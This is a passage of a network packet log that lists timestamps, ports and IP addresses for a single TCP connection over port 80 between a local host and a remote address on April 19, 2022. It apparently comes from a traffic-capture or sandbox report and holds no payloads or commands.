Apr 19, 2022 16:44:44.595796108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.595885038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.595927000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.596031904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.596071005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.596082926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.596246958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.596323967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.596369982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.596448898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.596494913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.596570969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.596677065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.596766949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.596821070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.596858978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.596905947 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.597011089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.597115040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.597245932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.597290993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.597322941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.597366095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.597446918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.597543955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.597665071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.597712994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.597767115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.597894907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.597944021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.598041058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.598083973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.598130941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.598288059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.598402023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.598443985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.598460913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.598500013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.598567963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.598687887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.598805904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.598846912 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.598963022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.599003077 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.599047899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.599126101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.599246025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.599288940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.599365950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.599406004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.599478006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.599592924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.599701881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.599746943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.599792004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.599832058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.599922895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.600039005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.600167036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.600209951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.600289106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.600327969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.600404024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.600486040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.600598097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.600651979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.600725889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.600771904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.600816965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.600969076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.601084948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.601130009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.601196051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.601237059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.601321936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.601407051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.601517916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.601562023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.601751089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.601804018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.602009058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.602096081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.602144957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.602241993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.602327108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.602448940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.602493048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.602569103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.602610111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.602688074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.602765083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.602886915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.602927923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.603003979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.603044033 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.603168011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.603286982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.603420019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.603462934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.603487968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.603523970 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.603599072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.603694916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.603794098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.603837967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.603912115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.603951931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.604089022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.604166031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.604233027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.604275942 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.604368925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.604412079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.604470015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.604615927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.604726076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.604768038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.604847908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.604887009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.604928017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.605042934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.605168104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.605207920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.605287075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.605324984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.605365992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.605490923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.605648041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.605695009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.605743885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.605843067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.605889082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.605945110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.605984926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.606091022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.606218100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.606287956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.606328964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.606408119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.606435061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.606450081 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.606528997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.606637001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.606679916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.606745005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.606849909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.606988907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.607033014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.607129097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.607167959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.607244968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.607363939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.607486963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.607531071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.607563019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.607599974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.607639074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.607768059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.607860088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.607902050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.608007908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.608047962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.608143091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.608247042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.608319044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.608359098 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.608448982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.608488083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.608572960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.608690977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.608827114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.608830929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.608943939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.609008074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.609054089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.609138966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.609211922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.609256029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.609347105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.609427929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.609477997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.609577894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.609627962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.609730959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.609850883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.609901905 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.609929085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.610049963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.610131979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.610179901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.610285997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.610409975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.610459089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.610482931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.610521078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.610610008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.610729933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.610845089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.610888958 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.610969067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.611006975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.611087084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.611167908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.611280918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.611320019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.611450911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.611489058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.611489058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.611618996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.611716986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.611758947 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.611887932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.611927032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.612020016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614213943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614234924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614250898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614269018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614286900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614303112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614308119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.614320993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614336014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614336014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.614356041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.614360094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614375114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614391088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614399910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.614408016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614424944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614428997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.614442110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614459991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614463091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.614475965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614492893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614511013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614516020 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.614528894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614542961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.614572048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.614581108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614856958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.614906073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.615098000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.615322113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.615531921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.615587950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.615771055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.615814924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.615931988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.616048098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.616162062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.616204977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.616250038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.616286993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.616327047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.616489887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.616556883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.616601944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.616719007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.616760969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.616807938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.616936922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.617022038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.617068052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.617193937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.617234945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.617301941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.617357969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.617468119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.617516994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.617582083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.617625952 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.617733955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.617801905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.617939949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.618002892 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.618015051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.618207932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.618263006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.618330956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.618372917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.618402958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.618485928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.618627071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.618695974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.618772030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.618823051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.618856907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.618978024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.619061947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.619115114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.619173050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.619220972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.619278908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.619430065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.619529009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.619574070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.619615078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.619658947 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.619730949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.619869947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.620008945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.620053053 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.620062113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.620100975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.620210886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.620289087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.620390892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.620433092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.620531082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.620572090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.620695114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.620769978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.620888948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.620937109 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.621011972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.621051073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.621090889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.621191978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.621326923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.621375084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.621433020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.621473074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.621571064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.621730089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.621768951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.621812105 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.621913910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.622090101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.622139931 CEST	49758	80	192.168.2.4	45.135.48.153
